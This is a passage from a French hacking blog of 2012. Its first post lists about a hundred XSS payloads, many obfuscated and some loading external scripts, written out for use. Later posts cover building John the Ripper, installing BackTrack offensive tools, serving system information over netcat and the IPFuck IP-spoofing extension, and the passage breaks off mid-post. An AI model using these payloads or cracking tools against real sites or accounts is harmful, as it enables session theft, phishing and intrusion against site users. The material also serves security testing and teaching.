☠ Binary Security

1001 façons de déclencher une faille XSS

2012-11-27T19:26:00.001+01:00

Une compilation d'une centaine de vecteurs d'attaque pour déclencher une faille XSS.

XSS ?

Le cross-site scripting (abrégé XSS), est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, permettant ainsi de provoquer des actions sur les navigateurs web visitant la page. Les possibilités des XSS sont très larges puisque l'attaquant peut utiliser tous les langages pris en charge par le navigateur (JavaScript, Java, Flash...) et de nouvelles possibilités sont régulièrement découvertes notamment avec l'arrivée de nouvelles technologies comme HTML5. Il est par exemple possible de rediriger vers un autre site pour du hameçonnage ou encore de voler la session en récupérant les cookies. Wikipédia

Vous l'avez compris, cette faille n'est surtout pas à négliger, et pourtant c'est une des plus courantes.

Pour avoir un exemple de sites connus vulnérables, faites un tour sur le tumblr www.xssinyourass.tumblr.com de l'ami @5ct34m :)

Avant de tester les 100 manières qui suivent, on peut essayer ces quatre là, qui fonctionnent ~~trop~~ très souvent :

<script>alert(1)</script> La classique :)
"'<xss><script>alert(1)</script>
"><script>alert(1)</script>
<%<!--'%><script>alert(1);</script --

En cas de succès, le navigateur devrait afficher une simple pop-up :

Le 1 ne sert que pour la démo, on peut mettre
tout ce que l'on souhaite à la place

Sinon...

<iframe src="&Tab;javascript:prompt(1)&Tab;">

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /**/>/**/alert(1)/**/</script /**/

"><h1/onmouseover='\u0061lert(1)'>

<iframe/src="data:text/html,<svg onload=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript&colon;alert(document&period;location)>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'>

<img/	
 src=`~` onerror=prompt(1)>

<form><iframe 	
 src="javascript:alert(1)"
	;>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]" onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

<style/onload=prompt('XSS')

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='<body onload=prompt(1)>'>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~~~>alert(0%0)</script ~~~>

<style/onload=&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)></script>

<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

@soaj1664ashar via pastebin.com/u6FY1xDA

La cross-compilation d'applications Windows depuis Linux

2012-10-17T21:45:00.000+02:00

Si vous avez l'habitude de coder en C/C++ sous Linux, vous savez donc à quel point il est frustrant de ne pas pouvoir produire directement un binaire pour Windows. Plus besoin de rebooter pour compiler grâce à cette astuce !

Pour commencer :

Un compilateur croisé (en anglais Cross Compiler) est un programme capable de traduire un code source en code objet ayant un environnement d'exécution (architecture matérielle, système d'exploitation) différent de celui où la compilation est effectuée. Ces compilateurs sont principalement utilisés en informatique industrielle et dans les systèmes embarqués. Wikipedia

Dans cet article, on va simplement créer un exécutable Windows qui affichera une fenêtre avec un message, le tout en restant sous Linux.

Prérequis : Rien de bien méchant ;)

root@localhost:/# sudo apt-get install wine mingw32 mingw32-binutils mingw32-runtime

Action !

Pour suivre la tradition, on va commencer par un hello world en console :

#include <stdio.h>

int main()
{
printf("Hello World !\n");
return 0;
}

Il faut remplacer i686-w64-mingw32-gcc par votre architecture.

root@localhost:/# i686-w64-mingw32-gcc -o hello.exe hello.c
root@localhost:/# wine hello.exe
Hello World !

Maintenant on va tester avec une application graphique :

#include <windows.h>

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
    LPSTR lpCmdLine, int nCmdShow)
{
  MessageBox(NULL,
    "Hello World !",
    "www.binsec.blogspot.fr", MB_OK);
  return 0;
}

root@localhost:/# i686-w64-mingw32-gcc -o fenetre.exe fenetre.c
root@localhost:/# wine fenetre.exe

Et voila les deux programmes en action sur Windows :

C'est à vous de jouer maintenant :)

Le chiffrement de disque en France

2012-10-10T18:53:00.000+02:00

Chiffrer ses disques durs ne vous met pas à l’abri de la loi…

En 4 points :

En France, la Loi pour la Confiance dans l’Économie Numérique (LCEN) du 21/06/04 rend l’utilisation des moyens de cryptologie libre.

I. - L'utilisation des moyens de cryptologie est libre.

II. - La fourniture, le transfert depuis ou vers un État membre de la Communauté européenne, l'importation et l'exportation des moyens de cryptologie assurant exclusivement des fonctions d'authentification ou de contrôle d'intégrité sont libres. Article 30-I

Cependant le refus de remise de la clé de chiffrement dudit fichier entraînera :

Est puni de trois ans d'emprisonnement et de 45 000 euros d'amende [*taux*] le fait, pour quiconque ayant connaissance de la convention secrète de déchiffrement d'un moyen de cryptologie susceptible d'avoir été utilisé pour préparer, faciliter ou commettre un crime ou un délit, de refuser de remettre ladite convention aux autorités judiciaires ou de la mettre en œuvre, sur les réquisitions de ces autorités délivrées en application des titres II et III du livre Ier du code de procédure pénale.

Si le refus est opposé alors que la remise ou la mise en œuvre de la convention aurait permis d'éviter la commission d'un crime ou d'un délit ou d'en limiter les effets, la peine est portée à cinq ans d'emprisonnement et à 75 000 euros d'amende. Article 434-15-2

L’utilisation d’un moyen chiffrement quelconque dans le but de commettre un délit engendrera :

Lorsqu'un moyen de cryptologie au sens de l'article 29 de la loi n° 2004-575 du 21 juin 2004 pour la confiance dans l'économie numérique a été utilisé pour préparer ou commettre un crime ou un délit, ou pour en faciliter la préparation ou la commission, le maximum de la peine privative de liberté encourue est relevé ainsi qu'il suit :

1° Il est porté à la réclusion criminelle à perpétuité lorsque l'infraction est punie de trente ans de réclusion criminelle;

2° Il est porté à trente ans de réclusion criminelle lorsque l'infraction est punie de vingt ans de réclusion criminelle;

3° Il est porté à vingt ans de réclusion criminelle lorsque l'infraction est punie de quinze ans de réclusion criminelle;

4° Il est porté à quinze ans de réclusion criminelle lorsque l'infraction est punie de dix ans d'emprisonnement;

5° Il est porté à dix ans d'emprisonnement lorsque l'infraction est punie de sept ans d'emprisonnement;

6° Il est porté à sept ans d'emprisonnement lorsque l'infraction est punie de cinq ans d'emprisonnement;

7° Il est porté au double lorsque l'infraction est punie de trois ans d'emprisonnement au plus.

Les dispositions du présent article ne sont toutefois pas applicables à l'auteur ou au complice de l'infraction qui, à la demande des autorités judiciaires ou administratives, leur a remis la version en clair des messages chiffrés ainsi que les conventions secrètes nécessaires au déchiffrement. Article 132-79

Pour finir, la justice peut mettre en place des moyens techniques afin d'essayer de trouver les clés de déchiffrement. Heureusement dans un sens...

Sans préjudice des dispositions des articles 60, 77-1 et 156, lorsqu'il apparaît que des données saisies ou obtenues au cours de l'enquête ou de l'instruction ont fait l'objet d'opérations de transformation empêchant d'accéder aux informations en clair qu'elles contiennent ou de les comprendre, le procureur de la République, la juridiction d'instruction ou la juridiction de jugement saisie de l'affaire peut désigner toute personne physique ou morale qualifiée, en vue d'effectuer les opérations techniques permettant d'obtenir la version en clair de ces informations ainsi que, dans le cas où un moyen de cryptologie a été utilisé, la convention secrète de déchiffrement, si cela apparaît nécessaire.

Si la personne ainsi désignée est une personne morale, son représentant légal soumet à l'agrément du procureur de la République ou de la juridiction saisie de l'affaire le nom de la ou des personnes physiques qui, au sein de celle-ci et en son nom, effectueront les opérations techniques mentionnées au premier alinéa. Sauf si elles sont inscrites sur une liste prévue à l'article 157, les personnes ainsi désignées prêtent, par écrit, le serment prévu au premier alinéa de l'article 160.

Si la peine encourue est égale ou supérieure à deux ans d'emprisonnement et que les nécessités de l'enquête ou de l'instruction l'exigent, le procureur de la République, la juridiction d'instruction ou la juridiction de jugement saisie de l'affaire peut prescrire le recours aux moyens de l’État soumis au secret de la défense nationale selon les formes prévues au présent chapitre. Article 230-1

C'est toujours utile de savoir ce genre de chose.

Mais il ne faut pas oublier qu'en 2010, même le FBI n'en est pas venu à bout face à un conteneur chiffré TrueCrypt...

Mieux vaut prévenir que guérir comme dirait l’autre.

Utiliser Netcat comme serveur web de secours

2012-10-03T16:17:00.000+02:00

Il peut arriver un jour, que l’on ait besoin d'un serveur web de poche pour publier un bête fichier HTML, du texte ou le résultat d'une commande sur une autre machine. Avec l'aide de Netcat c'est possible !

Le tout sur une seule ligne :

root@localhost:/tmp# while true; do nc -vlp 80 < index.html; done

On peut voir les requêtes du navigateur directement dans le terminal via le stdout :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate

On peut envoyer n'importe quoi par Netcat, par exemple :

root@localhost:/# while true; do echo "$(netstat -anptu)" | nc -vlp 80; done

root@localhost:/# while true; do echo "$(ps aux | sort -nk +4 | tail)" | nc -vlp 80; done

root@localhost:/# while true; do echo "$(lsof -nPi)" | nc -vlp 80; done

Il n'y a pas de limite, sauf votre imagination :)

Les manpages en couleurs

2012-09-22T18:16:00.000+02:00

Il existe un moyen super simple de colorer les manpages et donc de les rendre beaucoup plus agréables et pratiques à utiliser.

On veux donc arriver à ce résultat :

Pour cela, il faut avant tout installer most :

sudo apt-get install most

Et enfin, ajouter la variable :

export MANPAGER="/usr/bin/most -s"

Pour que la modification soit permanente :

echo 'export MANPAGER="/usr/bin/most -s"' >> ~/.profile

Voila :)

Lancez le man d'une commande, et admirez.

Si un jour vous voulez revenir à un affichage classique, il suffit de supprimer la variable et éventuellement most:

sed -i '/^export MANPAGER*/d' ~/.profile

sudo apt-get remove --purge most

Un générateur de mots de passe toutes options

2012-09-08T16:08:00.000+02:00

Nous y avons tous été confrontés un jour ou l'autre, le moment fatidique de trouver un bon mot de passe, qui soit suffisamment sécurisé mais encore simple à retenir. C'est à ce moment là que pwgen entre en jeu :)

pwgen est à l'origine un outil en ligne de commande sur Linux qui permet de générer un nombre prédéfini de mots de passe avec toutes sortes d'options, comme une longueur précise, l'ajout ou non de majuscules/chiffres/caractères spéciaux et une option spéciale qui génère des mots de passe complètement aléatoires, mais plus compliqués à retenir.

Trouvez vous ensuite un moyen mnémotechnique pour vous en rappeler.

Cet utilitaire est disponible dans une grande majorité des dépôts logiciels. Des forks pour Windows existent également. Il y a même une version lite en ligne.

root@localhost:/# pwgen -h
Usage: pwgen [ OPTIONS ] [ pw_length ] [ num_pw ]

Options supported by pwgen:
-c or --capitalize
    Include at least one capital letter in the password
-A or --no-capitalize
    Don't include capital letters in the password
-n or --numerals
    Include at least one number in the password
-0 or --no-numerals
    Don't include numbers in the password
-y or --symbols
    Include at least one special symbol in the password
-s or --secure
    Generate completely random passwords
-B or --ambiguous
    Don't include ambiguous characters in the password
-h or --help
    Print a help message
-H or --sha1=path/to/file[#seed]
    Use sha1 hash of given file as a (not so) random generator
-C    Print the generated passwords in columns
-1    Don't print the generated passwords in columns
-v or --no-vowels
    Do not use any vowels so as to avoid accidental nasty words

Quelques exemples :

Une liste de 16 mots de passe complètement aléatoires de 8 caractères, avec minuscules/majuscules et chiffres :

root@localhost:/# pwgen -cs 8 16
PILcY9Lt XlV5pt7w xELs0OGc LzOEW34o GJ0FTjNm 8szfcS6u kne1CByC je0m6HXa
Vpc8DwcM x4wj013F oOWePU9Y YPsYoB88 Vae22CqX 2IM2SzRk npE2HgbQ igIS48EK

5 mots de passe de 10 caractères avec des minuscules et des chiffres :

root@localhost:/# pwgen -An 10 5
hiexohw6ia cheez2aihu ew8yaeyuxu uchaiz4wei su4ifeesoh

Pour générer une liste en ligne de 10 mots de passe de 16 caractères vraiment barbares :

root@localhost:/# pwgen -cny1v 16 10
5v%`r7ZLXb@4Pvs-
_4z>4NfW7<TC_dW]
~S28<``&N)=`_F&x
f*G'}=?S'R}{7(m|
R@hq3gJ"JnQv7@z7
x8(<xJ|4|@64xp(Q
w8sRn(\P\zV=X-[v
GpHR_<fZc>X]#7p>
*%#QC8p8d2r<C:w~
V5C`L`dK9svg<&c"

Cela devrait rendre une attaque par brute-force tellement longue que d'ici là, nous serons tous partis sur Mars ou sur une autre planète à coloniser. Même l'ami John aura du mal à casser un mot de passe de ce genre.

www.pwgen.sourceforge.net

John the Ripper survitaminé avec le Jumbo patch

2012-08-25T16:43:00.000+02:00

Il existe une version bien plus complète du célèbre casseur de mots de passe, avec plus d'une centaine de types de hash et de chiffrement supportés.

Ce n'est pas une version officielle de John, elle est soutenue par la communauté.

John peut casser par exemple les clés privées SSH RSA/DSA, WPA/PSK, VNC, les archives ZIP et RAR, PDF, MD4, MD5, SHA-1, SHA-256, SHA-512, DES, NTLM, les documents Office 2007/2010, les documents OpenDocument (OpenOffice.org, LibreOffice), MySQL, Kerberos, Mac OS X Keychain, MSCHAPv2, etc.
Et en plus le support des GPU et du multi-threading.

On commence par télécharger les sources sur le site. Il faut la version community-enhanced.

Pour Windows, il suffit de prendre l'archive de celui-ci, les binaires sont dedant.

Pour les systèmes basés sur Unix (Linux, Android, MAC OS X...) il faut prendre une des deux archives, puis :

root@localhost:/tmp/john-1.7.9-jumbo-6$ cd src/
root@localhost:/tmp/john-1.7.9-jumbo-6/src$ make
To build John the Ripper, type:
        make clean SYSTEM
where SYSTEM can be one of the following:
([i] is an optional letter for pre-built intrinsics, eg. -sse2i vs -sse2):
linux-x86-64-native      Linux, x86-64 'native' (all CPU features you've got)
linux-x86-64-gpu         Linux, x86-64 'native', CUDA and OpenCL (experimental)
linux-x86-64-opencl      Linux, x86-64 'native', OpenCL (experimental)
linux-x86-64-cuda        Linux, x86-64 'native', CUDA (experimental)
linux-x86-64-avx         Linux, x86-64 with AVX (2011+ Intel CPUs)
linux-x86-64-xop         Linux, x86-64 with AVX and XOP (2011+ AMD CPUs)
linux-x86-64[i]          Linux, x86-64 with SSE2 (most common)
linux-x86-64-icc         Linux, x86-64 compiled with icc
linux-x86-64-clang       Linux, x86-64 compiled with clang
linux-x86-gpu            Linux, x86 32-bit with SSE2, CUDA and OpenCL (experimental)
linux-x86-opencl         Linux, x86 32-bit with SSE2 and OpenCL (experimental)
linux-x86-cuda           Linux, x86 32-bit with SSE2 and CUDA (experimental)
linux-x86-sse2[i]        Linux, x86 32-bit with SSE2 (most common, 32-bit)
linux-x86-native         Linux, x86 32-bit, with all CPU features you've got (not necessarily best)
linux-x86-mmx            Linux, x86 32-bit with MMX (for old computers)
linux-x86-any            Linux, x86 32-bit (for truly ancient computers)
linux-x86-clang          Linux, x86 32-bit with SSE2, compiled with clang
linux-alpha              Linux, Alpha
linux-sparc              Linux, SPARC 32-bit
linux-ppc32-altivec      Linux, PowerPC w/AltiVec (best)
linux-ppc32              Linux, PowerPC 32-bit
linux-ppc64              Linux, PowerPC 64-bit
linux-ia64               Linux, IA-64
freebsd-x86-64[i]        FreeBSD, x86-64 with SSE2 (best)
freebsd-x86-sse2[i]      FreeBSD, x86 with SSE2 (best if 32-bit)
freebsd-x86-mmx          FreeBSD, x86 with MMX
freebsd-x86-any          FreeBSD, x86
freebsd-alpha            FreeBSD, Alpha
openbsd-x86-64[i]        OpenBSD, x86-64 with SSE2 (best)
openbsd-x86-sse2[i]      OpenBSD, x86 with SSE2 (best if 32-bit)
openbsd-x86-mmx          OpenBSD, x86 with MMX
openbsd-x86-any          OpenBSD, x86
openbsd-alpha            OpenBSD, Alpha
openbsd-sparc64          OpenBSD, SPARC 64-bit (best)
openbsd-sparc            OpenBSD, SPARC 32-bit
openbsd-ppc32            OpenBSD, PowerPC 32-bit
openbsd-ppc64            OpenBSD, PowerPC 64-bit
openbsd-pa-risc          OpenBSD, PA-RISC
openbsd-vax              OpenBSD, VAX
netbsd-sparc64           NetBSD, SPARC 64-bit
netbsd-vax               NetBSD, VAX
solaris-sparc64-cc       Solaris, SPARC V9 64-bit, cc (best)
solaris-sparc64-gcc      Solaris, SPARC V9 64-bit, gcc
solaris-sparcv9-cc       Solaris, SPARC V9 32-bit, cc
solaris-sparcv8-cc       Solaris, SPARC V8 32-bit, cc
solaris-sparc-gcc        Solaris, SPARC 32-bit, gcc
solaris-x86-64-cc        Solaris, x86-64 with SSE2, cc
solaris-x86-64[i]-gcc    Solaris, x86-64 with SSE2, gcc
solaris-x86-sse2-cc      Solaris 9 4/04+, x86 with SSE2, cc
solaris-x86-sse2[i]-gcc Solaris 9 4/04+, x86 with SSE2, gcc
solaris-x86-mmx-cc       Solaris, x86 with MMX, cc
solaris-x86-mmx-gcc      Solaris, x86 with MMX, gcc
solaris-x86-any-cc       Solaris, x86, cc
solaris-x86-any-gcc      Solaris, x86, gcc
sco-x86-any-gcc          SCO, x86, gcc
sco-x86-any-cc           SCO, x86, cc
tru64-alpha              Tru64 (Digital UNIX, OSF/1), Alpha
aix-ppc32                AIX, PowerPC 32-bit
macosx-x86-64            Mac OS X 10.5+, Xcode 3.0+, x86-64 with SSE2 (best)
macosx-x86-64-opencl     Mac OS X 10.5+, Xcode 3.0+, x86-64 with SSE2, OpenCL support
macosx-x86-sse2          Mac OS X, x86 with SSE2
macosx-ppc32-altivec     Mac OS X, PowerPC w/AltiVec (best)
macosx-ppc32             Mac OS X, PowerPC 32-bit
macosx-ppc64             Mac OS X 10.4+, PowerPC 64-bit
macosx-universal         Mac OS X, Universal Binary (x86 + x86-64 + PPC)
hpux-pa-risc-gcc         HP-UX, PA-RISC, gcc
hpux-pa-risc-cc          HP-UX, PA-RISC, ANSI cc
irix-mips64-r10k         IRIX, MIPS 64-bit (R10K) (best)
irix-mips64              IRIX, MIPS 64-bit
irix-mips32              IRIX, MIPS 32-bit
dos-djgpp-x86-mmx        DOS, DJGPP, x86 with MMX
dos-djgpp-x86-any        DOS, DJGPP, x86
win32-cygwin-x86-sse2[i] Win32, Cygwin, x86 with SSE2 (best)
win32-cygwin-x86-mmx     Win32, Cygwin, x86 with MMX
win32-cygwin-x86-any     Win32, Cygwin, x86
win32-mingw-x86-sse2[i] Win32, MinGW, x86 with SSE2 (best)
win32-mingw-x86-mmx      Win32, MinGW, x86 with MMX
win32-mingw-x86-any      Win32, MinGW, x86
beos-x86-sse2            BeOS, x86 with SSE2 (best)
beos-x86-mmx             BeOS, x86 with MMX
beos-x86-any             BeOS, x86
generic                  Any other Unix-like system with gcc

Maintenant on choisit sur quel système on veut compiler, avec ou sans le support de CUDA et OpenCL, avec l'instruction SSE2... Ici on choisit linux-x86-64-native.

root@localhost:/tmp/john-1.7.9-jumbo-6/src$ make clean linux-x86-64-native

Si aucune erreur n'est survenue pendant la compilation, john se trouve dans le dossier run.

root@localhost:/tmp/john-1.7.9-jumbo-6/run$ ./john
John the Ripper password cracker, ver: 1.7.9-jumbo-6 [linux-x86-64-native]
Copyright (c) 1996-2012 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
--config=FILE             use FILE instead of john.conf or john.ini
--single[=SECTION]        "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
                  --pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE]         like --wordlist, but fetch words from a .pot file
--dupe-suppression        suppress all dupes in wordlist (and force preload)
--encoding=NAME           input data is non-ascii (eg. UTF-8, ISO-8859-1).
                          For a full list of NAME use --list=encodings
--rules[=SECTION]         enable word mangling rules for wordlist modes
--incremental[=MODE]      "incremental" mode [using section MODE]
--markov[=options]        "Markov" mode (see doc/MARKOV)
--external=MODE           external mode or word filter
--stdout[=LENGTH]         just output candidate passwords [cut at LENGTH]
--restore[=NAME]          restore an interrupted session [called NAME]
--session=NAME            give a new session the NAME
--status[=NAME]           print status of a session [called NAME]
--make-charset=FILE       make a charset file. It will be overwritten
--show[=LEFT]             show cracked passwords [if =LEFT, then uncracked]
--test[=TIME]             run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..]      load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]    load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]    load salts with[out] COUNT [to MAX] hashes
--pot=NAME                pot file to use
--format=NAME             force hash type NAME: afs bf bfegg bsdi crc32 crypt
                          des django dmd5 dominosec dragonfly3-32 dragonfly3-64
                          dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
                          epi episerver gost hdaa hmac-md5 hmac-sha1 hmac-sha224
                          hmac-sha256 hmac-sha384 hmac-sha512 hmailserver ipb2
                          keepass keychain krb4 krb5 lm lotus5 md4-gen md5 md5ns
                          mediawiki mscash mscash2 mschapv2 mskrb5 mssql mssql05
                          mysql mysql-sha1 nethalflm netlm netlmv2 netntlm
                          netntlmv2 nsldap nt nt2 odf office oracle oracle11 osc
                          pdf phpass phps pix-md5 pkzip po pwsafe racf rar
                          raw-md4 raw-md5 raw-md5u raw-sha raw-sha1
                          raw-sha1-linkedin raw-sha1-ng raw-sha224 raw-sha256
                          raw-sha384 raw-sha512 salted-sha1 sapb sapg sha1-gen
                          sha256crypt sha512crypt sip ssh sybasease trip vnc
                          wbb3 wpapsk xsha xsha512 zip
--list=WHAT               list capabilities, see doc/OPTIONS or --list=?
--save-memory=LEVEL       enable memory saving, at LEVEL 1..3
--mem-file-size=SIZE      size threshold for wordlist preload (default 5 MB)
--nolog                   disables creation and writing to john.log file
--crack-status            emit a status line whenever a password is cracked
--max-run-time=N          gracefully exit after this many seconds
--regen-lost-salts=N      regenerate lost salts (see doc/OPTIONS)
--plugin=NAME[,..]        load this (these) dynamic plugin(s)

À l'argument --format on remarque ce que John supporte.
On peut déplacer le dossier run où l'on souhaite ensuite.

Et enfin pour lancer un benchmark et voir les performances de votre machine de guerre :

root@localhost:/tmp/john-1.7.9-jumbo-6/run$ ./john --test

Pour la suite c'est vous qui voyez :)

www.openwall.com/john/

BackTrack 5 R3

2012-08-14T01:14:00.000+02:00

BackTrack 5, 3ème du nom, est disponible !

Après une première version sortie le 18 Août 2011, puis une deuxième le 1 Mars 2012, la troisième révision voit le jour !

Une première version de BT5 R3 fût disponible en format DVD à la BlackHat, l'équipe en a profitée pour encore corriger des bugs et ajouter les derniers outils sortis à la BlackHat et à la Defcon.

C'est donc pas moins de 60 nouveaux outils, une bonne mise à jour générale, une grosse correction de bugs sur l'ensemble du système, ainsi qu'une nouvelle section baptisée Physical Exploitation qui comporte un IDE pour Arduino et la boite à outils Kautilya pour le microcontrôleur Teensy.

Toujours disponible avec KDE et Gnome, en 32 et 64 bits, une image VMware de Gnome en 32 bits est également proposée.

Pour passer de BackTrack R2 à la R3 :

apt-get update && apt-get dist-upgrade



Puis suivant l'architecture :


32bits

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt

trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g

voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack

rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest

acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac

netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig

intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn

subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox

smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker

powersploit webhandle
64bits 

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt 
trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney 
apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt 
lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor 
iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec 
websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng 
3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw 
urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter 
multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker 
powersploit webhandler

Téléchargements

www.backtrack-linux.org

IPFuck !

2012-08-10T22:33:00.000+02:00

Comment montrer que l'adresse IP n'est pas une donnée sûre ?

Cet article est repris du blog de Paul Da Silva. Il réuni 2 articles portant sur IPFuck.

Tout le mérite lui revient.

IPFuck : alors comme ça l’adresse IP est une donnée sure ?

Depuis qu’internet existe le legislateur n’a eu de cesse de vouloir le contrôler. Parfois en essayant d’en contrôler le contenu, souvent en essayant d’en contrôler les acteurs. Pour ce faire il se basait souvent sur une donnée réputée sûre : l’adresse IP.

Mais les choses ont évolué et les technologies avec et, aujourd’hui, cette donnée n’est plus une donnée sûre !

Pourtant les lois qui continuent à être votées, Hadopi en tête, se basent toutes sur un relevé de ces fameuses adresses.

Depuis des mois (peut-être même plus d’un an) je ne laisse mon adresse IP presque nul part à l’aide d’une extension firefox que je vous avais déjà présenté ici : Modify Headers. Mais cette solution ne me suffisait plus et au vu des événements récents j’ai commencé à me poser des questions sur une généralisation et une simplification de cette méthode que j’utilisai jusqu’alors.

Puis l’actualité a été défrayée par un certain SeedFuck, logiciel de torrent poisoning dont je vous ai rapidement parlé sur mon dernier billet à propos d’Hadopi.

C’est ça ! Il faut que je combine les deux outils pour arriver à une solution très simple à l’utilisation et qui finisse d’achever l’adresse IP qui, encore aujourd’hui, fait accuser des innocents…

C’est ainsi qu’est né IPFuck (nommé d’après SeedFuck donc), le premier logiciel d’HTTP poisoning. Le principe est sensiblement le même qu’avec SeedFuck : il s’agit d’envoyer, en plus de sa vraie adresse IP que l’on ne peut pas masquer sans que les paquets ne se perdent, trois adresses générées aléatoirement, selon des règles que vous choisissez dans les options, ou parmi une liste d’adresses que vous choisissez.

Le serveur qui reçoit la requête l’interprète et renvoie la réponse au bon endroit. La navigation se passe donc exactement comme si vous n’aviez pas installé l’addon pour vous. Mais le site sur lequel vous vous êtes connecté a enregistré (potentiellement, tout dépend du code utilisé) 4 connexions différentes, dont trois sont effectuées avec une adresse qui ne vous appartient pas.

Et pour télécharger ce tout petit plugin qui devrait (enfin) finir de persuader quelques bien pensants que l’adresse IP n’est plus une preuve, c’est ici que ça se passe : IPFuck !

Quelques précisions sur l’utilisation et les limites d’IPFuck.

Dimanche soir je lançais IPFuck, une extension firefox d’HTTP poisoning. Le concept étant assez technique et surtout très abstrait je m’attendais à ce que certains aient du mal à en saisir l’intérêt voire que d’autres comprennent complètement de travers le but de cette extension. J’ai donc surveillé (autant que possible) ce qui s’est dit un peu partout sur la toile et il s’avère que j’avais raison d’avoir peur…

Je me dois donc de revenir ici sur le fonctionnement et le principe d’IPFuck en répondant aux interrogations que j’ai le plus souvent relevé. J’en oublie sûrement, mais ces points là sont fondamentaux et doivent être traités maintenant (si bien que j’ai sauté ma pause repas et suis en train de bouffer un sandwich devant l’admin de WordPress pour ça ^^).

C’est dégueulasse, ça va faire accuser des innocents

